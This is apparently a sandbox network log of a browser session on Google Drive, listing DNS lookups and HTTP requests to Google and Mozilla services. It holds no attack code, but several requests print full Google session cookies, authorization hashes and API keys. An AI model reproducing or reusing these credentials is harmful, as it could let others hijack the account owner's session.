OPTIONS /v1/items:get?ids=1CQ3l-ye73oq1wBdFfdlKbypM2DR08-Zj&ids=1xd1Q3YJLoqhw70rnOdQliNmdQ5KqBqdq&ids=1Btq9FoqYl0OY_C0V04HQPDaGjQFeqEOS&ids=1TVXsQLtyGv7rGnMn36rGMLrX7rY-l-bQ&ids=10guvatC5NIRhl-fRGMpXXolo1fXuw2OY&ids=14u9OTDOoiDcpQ6h9nFPDSO_l6ujE53q7&ids=19Lgs3mcgKQ86IxOVYzY7QnYq9l2UL2hz&ids=1QfnsOpJbRMcyuyGEjc1Gvz-rk_06CDLm65vjbK2ITxA&ids=151EHf1YmqNj86r2ZLc-P2dOkE7sqLqWo&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8 HTTP/2.0
host: drivefrontend-pa.clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: GET
access-control-request-headers: authorization,content-type,x-goog-authuser,x-goog-drive-client-version,x-goog-ext-472780938-jspb,x-goog-fieldmask
referer: https://drive.google.com/
origin: https://drive.google.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
OPTIONS

https://drivefrontend-pa.clients6.google.com/v1/items:get?ids=1CQ3l-ye73oq1wBdFfdlKbypM2DR08-Zj&ids=1xd1Q3YJLoqhw70rnOdQliNmdQ5KqBqdq&ids=1Btq9FoqYl0OY_C0V04HQPDaGjQFeqEOS&ids=1TVXsQLtyGv7rGnMn36rGMLrX7rY-l-bQ&ids=10guvatC5NIRhl-fRGMpXXolo1fXuw2OY&ids=14u9OTDOoiDcpQ6h9nFPDSO_l6ujE53q7&ids=19Lgs3mcgKQ86IxOVYzY7QnYq9l2UL2hz&ids=1QfnsOpJbRMcyuyGEjc1Gvz-rk_06CDLm65vjbK2ITxA&ids=151EHf1YmqNj86r2ZLc-P2dOkE7sqLqWo&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8

firefox.exe

Remote address:

142.250.187.202:443

Request

OPTIONS /v1/items:get?ids=1CQ3l-ye73oq1wBdFfdlKbypM2DR08-Zj&ids=1xd1Q3YJLoqhw70rnOdQliNmdQ5KqBqdq&ids=1Btq9FoqYl0OY_C0V04HQPDaGjQFeqEOS&ids=1TVXsQLtyGv7rGnMn36rGMLrX7rY-l-bQ&ids=10guvatC5NIRhl-fRGMpXXolo1fXuw2OY&ids=14u9OTDOoiDcpQ6h9nFPDSO_l6ujE53q7&ids=19Lgs3mcgKQ86IxOVYzY7QnYq9l2UL2hz&ids=1QfnsOpJbRMcyuyGEjc1Gvz-rk_06CDLm65vjbK2ITxA&ids=151EHf1YmqNj86r2ZLc-P2dOkE7sqLqWo&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8 HTTP/2.0
host: drivefrontend-pa.clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: GET
access-control-request-headers: authorization,content-type,x-goog-authuser,x-goog-drive-client-version,x-goog-ext-472780938-jspb,x-goog-fieldmask
referer: https://drive.google.com/
origin: https://drive.google.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
DNS

drivefrontend-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

drivefrontend-pa.clients6.google.com

IN AAAA

Response

drivefrontend-pa.clients6.google.com

IN AAAA

2a00:1450:4009:827::200a
DNS

drivefrontend-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

drivefrontend-pa.clients6.google.com

IN AAAA

Response

drivefrontend-pa.clients6.google.com

IN AAAA

2a00:1450:4009:827::200a
DNS

people-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

people-pa.clients6.google.com

IN A

Response

people-pa.clients6.google.com

IN A

142.250.187.202
DNS

people-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

people-pa.clients6.google.com

IN AAAA

Response

people-pa.clients6.google.com

IN AAAA

2a00:1450:4009:827::200a
DNS

appsgrowthpromo-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

appsgrowthpromo-pa.clients6.google.com

IN AAAA

Response

appsgrowthpromo-pa.clients6.google.com

IN AAAA

2a00:1450:4009:815::200a
DNS

202.212.58.216.in-addr.arpa

firefox.exe

Remote address:

8.8.8.8:53

Request

202.212.58.216.in-addr.arpa

IN PTR

Response

202.212.58.216.in-addr.arpa

IN PTR

ams16s21-in-f101e100net

202.212.58.216.in-addr.arpa

IN PTR

ams16s21-in-f202�I

202.212.58.216.in-addr.arpa

IN PTR

lhr25s27-in-f10�I
DNS

addons-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

addons-pa.clients6.google.com

IN A

Response

addons-pa.clients6.google.com

IN A

142.250.180.10
DNS

addons-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

addons-pa.clients6.google.com

IN A

Response

addons-pa.clients6.google.com

IN A

142.250.180.10
DNS

appsgrowthpromo-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

appsgrowthpromo-pa.clients6.google.com

IN A

Response

appsgrowthpromo-pa.clients6.google.com

IN A

216.58.212.202
DNS

appsgrowthpromo-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

appsgrowthpromo-pa.clients6.google.com

IN A

Response

appsgrowthpromo-pa.clients6.google.com

IN A

142.250.179.234
POST

https://appsgrowthpromo-pa.clients6.google.com/v1/promotion/FetchRecommendation?key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8&alt=protojson

firefox.exe

Remote address:

216.58.212.202:443

Request

POST /v1/promotion/FetchRecommendation?key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8&alt=protojson HTTP/2.0
host: appsgrowthpromo-pa.clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json+protobuf
x-javascript-user-agent: google-api-javascript-client/1.1.0
x-requested-with: XMLHttpRequest
x-goog-encode-response-if-executable: base64
x-goog-authuser: 0
authorization: SAPISIDHASH 1736791507_970e25f92afe2e1472e4871ad721352a9d064c4c SAPISID1PHASH 1736791507_970e25f92afe2e1472e4871ad721352a9d064c4c SAPISID3PHASH 1736791507_970e25f92afe2e1472e4871ad721352a9d064c4c
x-clientdetails: appVersion=5.0%20(Windows)&platform=Win32&userAgent=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64%3B%20rv%3A124.0)%20Gecko%2F20100101%20Firefox%2F124.0
content-length: 11
origin: https://drive.google.com
referer: https://drive.google.com/
cookie: NID=520=T_04-M8kKBur6a8xfbOKZjmjNL9kTBsRu4rsNMCHs2QeEnTGsSCv--CsUMA_7Anz-hnwKJxFceW9q7mFYd14TmmcRAIhSK1Oeg6osJyBPYL1pMxtdcR4OvTEnQ7S4FVUZSmXpoI5O0b0LQspJ9OJHjc0TCkB9hkcyI9YNZQ3H2G7mfch4GnsYQvFz7Zr9drrPCv8DidNMVtOI3oX2R9pf_Dcw77_z5rHJ6vSCU_yZxpvCkN76iAOCjoeiO1DW4sMIZ71Q_b_wECFS0hLszxIr4-MtFCeYZdWG-jHBBGz2zB0G6YokmReQFCtWrc_bai1UtObFu84NlaCLo_skwU5OOaIh27ImtzuhLub6cZQgKtvcqV09hIl7WhSHJvvytzRewFKw9q4ZzayCCw8DdlzO2I0Sh84i2-7ovfi9bwhHCL7fWPuG198xV3FS29hl4Nsr-F61VKb1RRTL2GWYIv4sY32ZwKErJsagoREX6wvEq9r5SOmW1IJhGRF2yOChgizYZ_Z2ZtMgxC1swD_aed-u80wmGjuIy_IGSMSzwlxZjm082Up-Ir0-C3oC0ytfiuk1Pd1LpY7I3AZM3005BIX5eiLzuVx43Y2fsqy6NOYsdhCipia86DC-k-N04EQow14XpWm9CPIRFYLHQKYMBoMsjnyTTpZfeNHkW-UdlDnvujgiv7-_z7t8brpew
cookie: __Secure-ENID=25.SE=bIIYgZkZWxhYfRmTcrOp3sqFLMtvji3aZrqUKJ8_J-Se7rF06urKMhgsY_OeHZxHrszdkyWyOsrwOlPtB6uBsuqmbJNJjb-k8ICDK78IXtvLAvxcANzv2ZaK0qz93HLrtH34QTHXH5pz_2JhzrqcnV4_qWtPRm_xNPez8_ksAJ7N-T39bULuUM7sPoyr6wLsVz2Z3sHgrVg
cookie: SID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87LbvT2mFp1XSQhsDasaQ5vQACgYKAboSARQSFQHGX2MipA0LB7c7dUJjxss4u9dqrBoVAUF8yKpGZiDl2Ga6DapczbtlldaB0076
cookie: __Secure-1PSID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87aCaNml9AANUb757qiR4SZAACgYKAWgSARQSFQHGX2MiEKAz7esHB3ithEcaY5wZ_hoVAUF8yKq4lYskHkX1uMPsUQAUwSmT0076
cookie: __Secure-3PSID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87b7qnsIBhDzT85TfZY1T0FAACgYKAeISARQSFQHGX2MikazmDfD73D18BiRF0NYpwBoVAUF8yKoaxFjFpOH7_uqYoOO9p66d0076
cookie: HSID=AB3UyDpOk1JCyfzEB
cookie: SSID=A0N6rAyypBzbvJcK2
cookie: APISID=zoylvknzg7AfstSu/A1huANewAO8jtX2AS
cookie: SAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: __Secure-1PAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: __Secure-3PAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: SIDCC=AKEyXzUdfF9ysvGVqQ8yMB6Fq_vDgc3HGDjpLn6IQPZrOhS6ge4rGx7n1nuO6VcOt4OJwyTTkQ
cookie: __Secure-1PSIDCC=AKEyXzVBOKym1Zj3DRTKXaC5k5piNKitJGEE-cSg2Tkuq7oBAqKoQlDVhfWDLwu5uDarY8AAVg
cookie: __Secure-3PSIDCC=AKEyXzUt3qVYxGcsvRP3wJI64jK-jKxU1kzDdjP5eHwl1lG4bPSrFpZ8z0sNKqsa2mCATRXhhQ
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
OPTIONS

https://appsgrowthpromo-pa.clients6.google.com/v1/promotion/FetchRecommendation?key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8&alt=protojson

firefox.exe

Remote address:

216.58.212.202:443

Request

OPTIONS /v1/promotion/FetchRecommendation?key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8&alt=protojson HTTP/2.0
host: appsgrowthpromo-pa.clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: POST
access-control-request-headers: authorization,content-type,x-clientdetails,x-goog-authuser,x-goog-encode-response-if-executable,x-javascript-user-agent,x-requested-with
referer: https://drive.google.com/
origin: https://drive.google.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
POST

https://addons-pa.clients6.google.com/$rpc/google.internal.apps.addons.v1.AddOnService/ListInstallations

firefox.exe

Remote address:

142.250.180.10:443

Request

POST /$rpc/google.internal.apps.addons.v1.AddOnService/ListInstallations HTTP/2.0
host: addons-pa.clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en
accept-encoding: gzip, deflate, br
x-goog-authuser: 0
x-goog-api-key: AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8
authorization: SAPISIDHASH 1736791507_970e25f92afe2e1472e4871ad721352a9d064c4c SAPISID1PHASH 1736791507_970e25f92afe2e1472e4871ad721352a9d064c4c SAPISID3PHASH 1736791507_970e25f92afe2e1472e4871ad721352a9d064c4c
content-type: application/json+protobuf
x-user-agent: grpc-web-javascript/0.1
content-length: 73
origin: https://drive.google.com
referer: https://drive.google.com/
cookie: NID=520=T_04-M8kKBur6a8xfbOKZjmjNL9kTBsRu4rsNMCHs2QeEnTGsSCv--CsUMA_7Anz-hnwKJxFceW9q7mFYd14TmmcRAIhSK1Oeg6osJyBPYL1pMxtdcR4OvTEnQ7S4FVUZSmXpoI5O0b0LQspJ9OJHjc0TCkB9hkcyI9YNZQ3H2G7mfch4GnsYQvFz7Zr9drrPCv8DidNMVtOI3oX2R9pf_Dcw77_z5rHJ6vSCU_yZxpvCkN76iAOCjoeiO1DW4sMIZ71Q_b_wECFS0hLszxIr4-MtFCeYZdWG-jHBBGz2zB0G6YokmReQFCtWrc_bai1UtObFu84NlaCLo_skwU5OOaIh27ImtzuhLub6cZQgKtvcqV09hIl7WhSHJvvytzRewFKw9q4ZzayCCw8DdlzO2I0Sh84i2-7ovfi9bwhHCL7fWPuG198xV3FS29hl4Nsr-F61VKb1RRTL2GWYIv4sY32ZwKErJsagoREX6wvEq9r5SOmW1IJhGRF2yOChgizYZ_Z2ZtMgxC1swD_aed-u80wmGjuIy_IGSMSzwlxZjm082Up-Ir0-C3oC0ytfiuk1Pd1LpY7I3AZM3005BIX5eiLzuVx43Y2fsqy6NOYsdhCipia86DC-k-N04EQow14XpWm9CPIRFYLHQKYMBoMsjnyTTpZfeNHkW-UdlDnvujgiv7-_z7t8brpew
cookie: __Secure-ENID=25.SE=bIIYgZkZWxhYfRmTcrOp3sqFLMtvji3aZrqUKJ8_J-Se7rF06urKMhgsY_OeHZxHrszdkyWyOsrwOlPtB6uBsuqmbJNJjb-k8ICDK78IXtvLAvxcANzv2ZaK0qz93HLrtH34QTHXH5pz_2JhzrqcnV4_qWtPRm_xNPez8_ksAJ7N-T39bULuUM7sPoyr6wLsVz2Z3sHgrVg
cookie: SID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87LbvT2mFp1XSQhsDasaQ5vQACgYKAboSARQSFQHGX2MipA0LB7c7dUJjxss4u9dqrBoVAUF8yKpGZiDl2Ga6DapczbtlldaB0076
cookie: __Secure-1PSID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87aCaNml9AANUb757qiR4SZAACgYKAWgSARQSFQHGX2MiEKAz7esHB3ithEcaY5wZ_hoVAUF8yKq4lYskHkX1uMPsUQAUwSmT0076
cookie: __Secure-3PSID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87b7qnsIBhDzT85TfZY1T0FAACgYKAeISARQSFQHGX2MikazmDfD73D18BiRF0NYpwBoVAUF8yKoaxFjFpOH7_uqYoOO9p66d0076
cookie: HSID=AB3UyDpOk1JCyfzEB
cookie: SSID=A0N6rAyypBzbvJcK2
cookie: APISID=zoylvknzg7AfstSu/A1huANewAO8jtX2AS
cookie: SAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: __Secure-1PAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: __Secure-3PAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: SIDCC=AKEyXzVSJZiQZb4ZXNiUEe1kmU8_rz9PdnVLNXoHOLdkknlLlJI6u-zXfWodi6Zpu0LiBH059w
cookie: __Secure-1PSIDCC=AKEyXzXXX5gRhCd6vv-f84QLTP-iMHSYKOdWfuEUh0tQazwn12uslzgsvp6vSAi7vmEP4nw9vg
cookie: __Secure-3PSIDCC=AKEyXzV-MAABCmBK4s99akAmgF4hb38Hf4RGocuTt9IgN9eZXKlWovHx19i5boTUQb6dw6CZ_A
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
OPTIONS

https://addons-pa.clients6.google.com/$rpc/google.internal.apps.addons.v1.AddOnService/ListInstallations

firefox.exe

Remote address:

142.250.180.10:443

Request

OPTIONS /$rpc/google.internal.apps.addons.v1.AddOnService/ListInstallations HTTP/2.0
host: addons-pa.clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: POST
access-control-request-headers: authorization,content-type,x-goog-api-key,x-goog-authuser,x-user-agent
referer: https://drive.google.com/
origin: https://drive.google.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
DNS

addons-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

addons-pa.clients6.google.com

IN AAAA

Response

addons-pa.clients6.google.com

IN AAAA

2a00:1450:4009:80b::200a
DNS

addons-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

addons-pa.clients6.google.com

IN AAAA

Response

addons-pa.clients6.google.com

IN AAAA

2a00:1450:4009:81d::200a
DNS

youtube.googleapis.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube.googleapis.com

IN A

Response

youtube.googleapis.com

IN A

142.250.179.234

youtube.googleapis.com

IN A

216.58.212.234

youtube.googleapis.com

IN A

142.250.187.202

youtube.googleapis.com

IN A

142.250.180.10

youtube.googleapis.com

IN A

142.250.178.10

youtube.googleapis.com

IN A

216.58.204.74

youtube.googleapis.com

IN A

172.217.169.74

youtube.googleapis.com

IN A

216.58.213.10

youtube.googleapis.com

IN A

216.58.212.202

youtube.googleapis.com

IN A

172.217.169.42

youtube.googleapis.com

IN A

172.217.16.234

youtube.googleapis.com

IN A

142.250.187.234

youtube.googleapis.com

IN A

142.250.200.42

youtube.googleapis.com

IN A

216.58.201.106

youtube.googleapis.com

IN A

142.250.200.10
DNS

youtube.googleapis.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube.googleapis.com

IN AAAA

Response

youtube.googleapis.com

IN AAAA

2a00:1450:4009:823::200a

youtube.googleapis.com

IN AAAA

2a00:1450:4009:820::200a

youtube.googleapis.com

IN AAAA

2a00:1450:4009:815::200a

youtube.googleapis.com

IN AAAA

2a00:1450:4009:821::200a
DNS

10.180.250.142.in-addr.arpa

firefox.exe

Remote address:

8.8.8.8:53

Request

10.180.250.142.in-addr.arpa

IN PTR

Response

10.180.250.142.in-addr.arpa

IN PTR

lhr25s32-in-f101e100net
DNS

google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

google.com

IN A

Response

google.com

IN A

142.250.180.14
DNS

contacts.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

contacts.google.com

IN A

Response

contacts.google.com

IN CNAME

plus.l.google.com

plus.l.google.com

IN A

142.250.178.14
DNS

signaler-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

signaler-pa.clients6.google.com

IN A

Response

signaler-pa.clients6.google.com

IN A

172.217.169.74
DNS

signaler-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

signaler-pa.clients6.google.com

IN A

Response

signaler-pa.clients6.google.com

IN A

142.250.180.10
DNS

234.179.250.142.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

234.179.250.142.in-addr.arpa

IN PTR

Response

234.179.250.142.in-addr.arpa

IN PTR

lhr25s31-in-f101e100net
DNS

ogs.google.com

NetworkService

Remote address:

8.8.8.8:53

Request

ogs.google.com

IN A

Response

ogs.google.com

IN CNAME

www3.l.google.com

www3.l.google.com

IN A

142.250.178.14
DNS

ogs.google.com

NetworkService

Remote address:

8.8.8.8:53

Request

ogs.google.com

IN A

Response

ogs.google.com

IN CNAME

www3.l.google.com

www3.l.google.com

IN A

142.250.178.14
POST

https://signaler-pa.clients6.google.com/punctual/v1/chooseServer?key=AIzaSyAWGrfCCr7albM3lmCc937gx4uIphbpeKQ

firefox.exe

Remote address:

172.217.169.74:443

Request

POST /punctual/v1/chooseServer?key=AIzaSyAWGrfCCr7albM3lmCc937gx4uIphbpeKQ HTTP/2.0
host: signaler-pa.clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json+protobuf
authorization: SAPISIDHASH 1736791511_0917efe8c124dc93873d114916b0ab16e4ea020e
x-goog-authuser: 0
content-length: 59
origin: https://drive.google.com
referer: https://drive.google.com/
cookie: NID=520=T_04-M8kKBur6a8xfbOKZjmjNL9kTBsRu4rsNMCHs2QeEnTGsSCv--CsUMA_7Anz-hnwKJxFceW9q7mFYd14TmmcRAIhSK1Oeg6osJyBPYL1pMxtdcR4OvTEnQ7S4FVUZSmXpoI5O0b0LQspJ9OJHjc0TCkB9hkcyI9YNZQ3H2G7mfch4GnsYQvFz7Zr9drrPCv8DidNMVtOI3oX2R9pf_Dcw77_z5rHJ6vSCU_yZxpvCkN76iAOCjoeiO1DW4sMIZ71Q_b_wECFS0hLszxIr4-MtFCeYZdWG-jHBBGz2zB0G6YokmReQFCtWrc_bai1UtObFu84NlaCLo_skwU5OOaIh27ImtzuhLub6cZQgKtvcqV09hIl7WhSHJvvytzRewFKw9q4ZzayCCw8DdlzO2I0Sh84i2-7ovfi9bwhHCL7fWPuG198xV3FS29hl4Nsr-F61VKb1RRTL2GWYIv4sY32ZwKErJsagoREX6wvEq9r5SOmW1IJhGRF2yOChgizYZ_Z2ZtMgxC1swD_aed-u80wmGjuIy_IGSMSzwlxZjm082Up-Ir0-C3oC0ytfiuk1Pd1LpY7I3AZM3005BIX5eiLzuVx43Y2fsqy6NOYsdhCipia86DC-k-N04EQow14XpWm9CPIRFYLHQKYMBoMsjnyTTpZfeNHkW-UdlDnvujgiv7-_z7t8brpew
cookie: __Secure-ENID=25.SE=bIIYgZkZWxhYfRmTcrOp3sqFLMtvji3aZrqUKJ8_J-Se7rF06urKMhgsY_OeHZxHrszdkyWyOsrwOlPtB6uBsuqmbJNJjb-k8ICDK78IXtvLAvxcANzv2ZaK0qz93HLrtH34QTHXH5pz_2JhzrqcnV4_qWtPRm_xNPez8_ksAJ7N-T39bULuUM7sPoyr6wLsVz2Z3sHgrVg
cookie: SID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87LbvT2mFp1XSQhsDasaQ5vQACgYKAboSARQSFQHGX2MipA0LB7c7dUJjxss4u9dqrBoVAUF8yKpGZiDl2Ga6DapczbtlldaB0076
cookie: __Secure-1PSID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87aCaNml9AANUb757qiR4SZAACgYKAWgSARQSFQHGX2MiEKAz7esHB3ithEcaY5wZ_hoVAUF8yKq4lYskHkX1uMPsUQAUwSmT0076
cookie: __Secure-3PSID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87b7qnsIBhDzT85TfZY1T0FAACgYKAeISARQSFQHGX2MikazmDfD73D18BiRF0NYpwBoVAUF8yKoaxFjFpOH7_uqYoOO9p66d0076
cookie: HSID=AB3UyDpOk1JCyfzEB
cookie: SSID=A0N6rAyypBzbvJcK2
cookie: APISID=zoylvknzg7AfstSu/A1huANewAO8jtX2AS
cookie: SAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: __Secure-1PAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: __Secure-3PAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: SIDCC=AKEyXzVt6-INo7cWUawZ53cL_SSuLwmQoulRGIrpXmwG2C1ikIr4tPzEBFFdWxya4JKjgJhKAQ
cookie: __Secure-1PSIDCC=AKEyXzU9dBZHvqL9mN3CQGqyc3jdF8pygX-QqRBVij4oqnTo3SvWyW7fcEkRleDJsLiSV41iLQ
cookie: __Secure-3PSIDCC=AKEyXzW7sItUvjD1AbWsqKig6S3BZlp4bHzs9Y7CAKNPR8aRDG0yej3iVm4K_5eHd7oUhlbKIA
cookie: __Secure-1PSIDTS=sidts-CjIBmiPuTcCbX15oqK--avtEw_Mf7bfEFYHz5ZjJmm6-rFjBKKNkd2vWn_7Su9720l2xiRAA
cookie: __Secure-3PSIDTS=sidts-CjIBmiPuTcCbX15oqK--avtEw_Mf7bfEFYHz5ZjJmm6-rFjBKKNkd2vWn_7Su9720l2xiRAA
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
OPTIONS

https://signaler-pa.clients6.google.com/punctual/v1/chooseServer?key=AIzaSyAWGrfCCr7albM3lmCc937gx4uIphbpeKQ

firefox.exe

Remote address:

172.217.169.74:443

Request

OPTIONS /punctual/v1/chooseServer?key=AIzaSyAWGrfCCr7albM3lmCc937gx4uIphbpeKQ HTTP/2.0
host: signaler-pa.clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: POST
access-control-request-headers: authorization,content-type,x-goog-authuser
referer: https://drive.google.com/
origin: https://drive.google.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
OPTIONS

https://signaler-pa.clients6.google.com/punctual/multi-watch/channel?VER=8&gsessionid=N-Ne7PC9x8s47isWYIAVHGNK9ZUCiJXT_UmU-cTVqbQ&key=AIzaSyAWGrfCCr7albM3lmCc937gx4uIphbpeKQ&RID=81531&CVER=22&zx=tf45q0s82vdc&t=1

firefox.exe

Remote address:

172.217.169.74:443

Request

OPTIONS /punctual/multi-watch/channel?VER=8&gsessionid=N-Ne7PC9x8s47isWYIAVHGNK9ZUCiJXT_UmU-cTVqbQ&key=AIzaSyAWGrfCCr7albM3lmCc937gx4uIphbpeKQ&RID=81531&CVER=22&zx=tf45q0s82vdc&t=1 HTTP/2.0
host: signaler-pa.clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: POST
access-control-request-headers: authorization,x-goog-authuser,x-webchannel-content-type
referer: https://drive.google.com/
origin: https://drive.google.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
DNS

signaler-pa.clients6.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

signaler-pa.clients6.google.com

IN AAAA

Response

signaler-pa.clients6.google.com

IN AAAA

2a00:1450:4009:822::200a
DNS

signaler-pa.clients6.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

signaler-pa.clients6.google.com

IN AAAA

Response

signaler-pa.clients6.google.com

IN AAAA

2a00:1450:4009:822::200a
DNS

74.169.217.172.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

74.169.217.172.in-addr.arpa

IN PTR

Response

74.169.217.172.in-addr.arpa

IN PTR

lhr48s09-in-f101e100net
DNS

74.169.217.172.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

74.169.217.172.in-addr.arpa

IN PTR

Response

74.169.217.172.in-addr.arpa

IN PTR

lhr48s09-in-f101e100net
DNS

location.services.mozilla.com

firefox.exe

Remote address:

8.8.8.8:53

Request

location.services.mozilla.com

IN A

Response

location.services.mozilla.com

IN CNAME

prod.classify-client.prod.webservices.mozgcp.net

prod.classify-client.prod.webservices.mozgcp.net

IN A

35.190.72.216
DNS

location.services.mozilla.com

firefox.exe

Remote address:

8.8.8.8:53

Request

location.services.mozilla.com

IN A

Response

location.services.mozilla.com

IN CNAME

prod.classify-client.prod.webservices.mozgcp.net

prod.classify-client.prod.webservices.mozgcp.net

IN A

35.190.72.216
GET

https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb

firefox.exe

Remote address:

35.190.72.216:443

Request

GET /v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb HTTP/2.0
host: location.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
te: trailers
DNS

prod.classify-client.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.classify-client.prod.webservices.mozgcp.net

IN A

Response

prod.classify-client.prod.webservices.mozgcp.net

IN A

35.190.72.216
DNS

prod.classify-client.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.classify-client.prod.webservices.mozgcp.net

IN A

Response

prod.classify-client.prod.webservices.mozgcp.net

IN A

35.190.72.216
DNS

prod.balrog.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.balrog.prod.cloudops.mozgcp.net

IN A

Response

prod.balrog.prod.cloudops.mozgcp.net

IN A

35.244.181.201
DNS

prod.balrog.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.balrog.prod.cloudops.mozgcp.net

IN A

Response

prod.balrog.prod.cloudops.mozgcp.net

IN A

35.244.181.201
DNS

